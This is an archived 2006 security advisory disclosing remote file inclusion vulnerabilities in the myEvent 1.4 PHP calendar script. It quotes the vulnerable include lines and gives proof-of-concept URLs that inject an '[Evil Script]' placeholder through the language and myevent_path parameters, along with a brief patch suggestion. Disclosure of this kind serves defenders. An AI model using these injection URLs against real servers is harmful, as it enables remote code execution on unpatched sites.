OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
myEvent <= 1.4 Multiple Remote File Include Vulnerabilities

sh3llsh3ll.ir
Date: Sat Aug 12 2006 - 05:03:15 CDT


---------------------------------------------------------------------------------------
myEvent 1.4 Multiple Remote File Include Vulnerabilities
---------------------------------------------------------------------------------------
Author : Sh3ll
Date : 2006/08/11
HomePage : http://www.sh3ll.ir
Contact : sh3ll[at]sh3ll[dot]ir
---------------------------------------------------------------------------------------
Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : myEvent
version : 1.4
Venedor : http://www.mywebland.com
Class : Remote File Inclusion
Risk : High
Summary :
myEvent Is a Dynamic Calendar Based Events Management System.
---------------------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~
in admin.php , event.php , initialize.php , myevent.php , viewevent.php We Found
Vulnerability Script
----------------------------------------admin.php--------------------------------------
....
<?php
        include_once($language);
        ?>
...
----------------------------------------event.php--------------------------------------
....
<?php
        
        include_once $myevent_path."includes/template.php";
        ?>
...
--------------------------------------initialize.php-----------------------------------
....
<?php
        
        include $myevent_path."config.php";
        include $myevent_path.$language;
        include_once $myevent_path."includes/template.php"
        ?>
...
----------------------------------------myevent.php------------------------------------
....
<?php
        include_once $myevent_path."initialize.php";
        ?>
...
---------------------------------------viewevent.php-----------------------------------
....
<?php
        
        include_once $myevent_path."initialize.php";
        ?>
...
---------------------------------------------------------------------------------------
PoC:
~~~
http://www.target.com/[myEvent]/admin.php?language=[Evil Script]
http://www.target.com/[myEvent]/event.php?myevent_path=[Evil Script]
http://www.target.com/[myEvent]/initialize.php?myevent_path=[Evil Script]
http://www.target.com/[myEvent]/myevent.php?myevent_path=[Evil Script]
http://www.target.com/[myEvent]/viewevent.php?myevent_path=[Evil Script]

Solution:
~~~~~~~~
Sanitize Variabel $language in admin.php & Sanitize Variabel $myevent_path in admin.php
event.php , initialize.php , myevent.php , viewevent.php
----------------------------------------------------------------------------------------
Note:
~~~~
Venedor Contacted, But No Response. So Do a Dirty Patch.
----------------------------------------------------------------------------------------
Shoutz:
~~~~~~
~ Special Greetz To My Best Friend N4sh3n4s & My GF Atena
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams